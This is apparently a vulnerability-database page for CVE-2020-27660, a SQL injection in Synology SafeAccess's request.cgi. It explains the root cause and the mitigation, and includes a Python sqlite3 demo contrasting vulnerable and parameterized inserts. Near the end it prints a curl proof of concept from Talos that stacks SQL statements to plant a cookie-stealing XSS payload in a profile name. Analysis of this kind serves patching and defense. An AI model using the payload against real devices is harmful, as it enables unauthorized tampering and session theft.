CVE-2020-27660
Description
SQL injection vulnerability in request.cgi in Synology SafeAccess before 1.2.3-0234 allows remote attackers to execute arbitrary SQL commands via the domain parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
SQL injection in Synology SafeAccess request.cgi allows remote attackers to execute arbitrary SQL commands via the domain parameter.
Vulnerability
An SQL injection vulnerability exists in the request.cgi binary of Synology SafeAccess before version 1.2.3-0234 [3]. The domain parameter is not sanitized before being interpolated into an SQLite query, so an attacker can inject arbitrary SQL statements [2]. The vulnerable code path is reached when a client on a network with an active SafeAccess profile requests a blocked domain and is served the blocking page, which logs the request [1][2].
Exploitation
An attacker on the local network can send a crafted HTTP GET request to /cgi/request.cgi with a malicious domain parameter containing SQL injection payloads [2]. No authentication is required, and no user interaction is needed [3]. The request is logged into the SQLite database, and the injected SQL commands are executed [1]. For example, the attacker can modify the fbsharing.db database to expose internal directories [1].
Impact
Successful exploitation allows an attacker to execute arbitrary SQL commands on the SQLite database used by SafeAccess [2]. This can lead to disclosure of sensitive information, modification of database contents, and potentially remote code execution [2]. The attacker could, for instance, alter the file sharing database to gain access to all files accessible through File Station [1]. The CVSSv3 score is 9.6 (Critical) with a vector of AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H [3].
Mitigation
Synology has released SafeAccess version 1.2.3-0234 to fix this vulnerability [3]. Users should upgrade to this version or later. No workarounds are available [3]. The vulnerability was disclosed in Synology-SA-20:25 [1][3].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products (2)
- (no CPE) range: <1.2.3-0234
- (no CPE) range: unspecified
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input sanitization in the `domain` parameter allows SQL injection via unsanitized string interpolation in a SQLite INSERT query."
Attack vector
An attacker on the local network sends a crafted HTTP GET request to `/cgi/request.cgi` with a malicious `domain` parameter containing SQL metacharacters [ref_id=1]. The `domain` value is passed unsanitized into a SQLite INSERT query, enabling stacked SQL injection [ref_id=1]. Because the httpd server runs as root, the attacker can leverage the injection to execute arbitrary code or, as demonstrated in the PoC, attach to another database and inject an XSS payload into profile names to steal administrator session cookies [ref_id=1]. No authentication is required; the attacker only needs network access to the router's web interface [ref_id=1].
Affected code
The vulnerability resides in the `syno::safeaccess::insert` function within `libsynosafeaccesslog.so`. The function builds a SQL INSERT query using a format string where the `text` parameter (derived from the HTTP `domain` parameter) is wrapped in single quotes but never escaped or sanitized before being passed to `SQLite::Database::exec` [ref_id=1]. The entry point is `request.cgi`, which handles the unauthenticated GET request to `/cgi/request.cgi` [ref_id=1].
What the fix does
The advisory does not include a patch diff, but the remediation is to upgrade SafeAccess to version 1.2.3-0234 or later [ref_id=1]. The fix presumably adds proper escaping or parameterized queries for the `domain` value before it is inserted into the SQL statement, preventing the injection of arbitrary SQL commands [ref_id=1]. No further technical details about the fix are provided in the available references.
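The following is an added example written for this page in Python's sqlite3 module; it is not the SafeAccess code (which is C++ calling SQLite::Database::exec) and not the vendor's fix. It reproduces the mechanic described under Root cause and Affected code, and shows the parameterized form that the fix is presumed to use. Assumptions: the log table and its columns are invented stand-ins, the second database is a stand-in for the SafeAccess database.db with only the profile.id and profile.name columns the Talos PoC targets, and the PoC's leading commit; implies the real INSERT runs inside an open transaction, so the vulnerable function starts one with BEGIN. The payload uses standard single-quoted SQL literals where the PoC used SQLite's double-quoted form.

```python
import os
import sqlite3
import tempfile

# Stored XSS string from the Talos PoC (profile name shown in the admin UI).
XSS = "user<img src=/ onerror=\"alert(document.cookie)\"/>"


def setup_dbs(workdir):
    """Create a stand-in log database and a stand-in access-control database.
    Schema is assumed; only profile.id / profile.name come from the PoC."""
    log_path = os.path.join(workdir, "log.db")
    ctrl_path = os.path.join(workdir, "database.db")
    con = sqlite3.connect(log_path)
    con.execute("CREATE TABLE log (id INTEGER PRIMARY KEY, profile_id INTEGER, domain TEXT)")
    con.commit()
    con.close()
    con = sqlite3.connect(ctrl_path)
    con.execute("CREATE TABLE profile (id INTEGER PRIMARY KEY, name TEXT)")
    con.execute("INSERT INTO profile (id, name) VALUES (3, 'kids')")
    con.commit()
    con.close()
    return log_path, ctrl_path


def build_payload(ctrl_path):
    """Same shape as the PoC's domain value: close the quoted literal and the
    VALUES list, terminate the INSERT, stack ATTACH + UPDATE, then comment out
    the rest of the original statement with '--'."""
    return ("'); commit; attach database '%s' as x; "
            "update x.profile set name='%s' where id=3; --" % (ctrl_path, XSS))


def log_request_vulnerable(log_path, domain, profile_id=1):
    """Vulnerable pattern: the value is wrapped in quotes by a format string and
    the text is handed to a multi-statement exec, so stacked statements run.
    BEGIN emulates the transaction the real code apparently holds (assumption)."""
    script = ("BEGIN; INSERT INTO log (profile_id, domain) VALUES (%d, '%s');"
              % (profile_id, domain))
    con = sqlite3.connect(log_path)
    try:
        con.executescript(script)  # like sqlite3_exec: every statement is executed
    finally:
        con.close()


def log_request_fixed(log_path, domain, profile_id=1):
    """Hardened form: a bound parameter is data, never parsed as SQL."""
    con = sqlite3.connect(log_path)
    try:
        con.execute("INSERT INTO log (profile_id, domain) VALUES (?, ?)",
                    (profile_id, domain))
        con.commit()
    finally:
        con.close()


def profile_name(ctrl_path, pid=3):
    con = sqlite3.connect(ctrl_path)
    try:
        return con.execute("SELECT name FROM profile WHERE id=?", (pid,)).fetchone()[0]
    finally:
        con.close()


def stored_domains(log_path):
    con = sqlite3.connect(log_path)
    try:
        return [r[0] for r in con.execute("SELECT domain FROM log ORDER BY id")]
    finally:
        con.close()


def demo(insert_fn):
    """Run one insert function against fresh databases with the PoC-shaped payload.
    Returns (profile name afterwards, list of domain strings actually stored)."""
    with tempfile.TemporaryDirectory() as d:
        log_path, ctrl_path = setup_dbs(d)
        insert_fn(log_path, build_payload(ctrl_path))
        return profile_name(ctrl_path), stored_domains(log_path)


if __name__ == "__main__":
    print("vulnerable:", demo(log_request_vulnerable))
    print("fixed:     ", demo(log_request_fixed))
```

With the vulnerable function the stored domain is the empty string and profile 3 in the attached database now carries the XSS payload; with the parameterized function the whole payload is stored verbatim as a domain string and the profile is untouched. The example also makes the ATTACH step concrete: once the injected text is executed by a process with filesystem rights, the attacker chooses which database file on disk the stacked statements operate on.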
Preconditions
- network: the attacker must have network access to the Synology router's web interface (adjacent network, CVSS:3.0/AV:A)
- config: the SafeAccess package must be installed and enabled on the Synology SRM device
- auth: no authentication required; the request.cgi endpoint is accessible without credentials
- input: the attacker sends a crafted domain parameter in the HTTP GET request
Reproduction
The following proof-of-concept is reproduced from the Talos advisory [ref_id=1]:
```
$ sql='commit;'\
'attach database "/usr/syno/etc/packages/SafeAccess/synoaccesscontrol/database.db" as x;'\
'update x.profile set name="user<img src=/ onerror=""alert(document.cookie)""/>" where id=3;'
$ curl "http://10.254.1.2/cgi/request.cgi?domain=%27);"$(echo "$sql" | sed "s/ /%20/g")"--"
```
The `%27);` prefix closes the quoted `domain` literal and the surrounding VALUES list, the stacked statements commit the open transaction, attach the SafeAccess profile database and rewrite a profile name with an XSS payload, and the trailing `--` comments out the remainder of the original INSERT. When an administrator views the SafeAccess logs or profiles, the JavaScript executes, allowing session cookie theft [ref_id=1].
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- www.synology.com/security/advisory/Synology_SA_20_25 (CONFIRM)
- www.talosintelligence.com/vulnerability_reports/TALOS-2020-1087 (MISC)
News mentions
No linked articles in our index yet.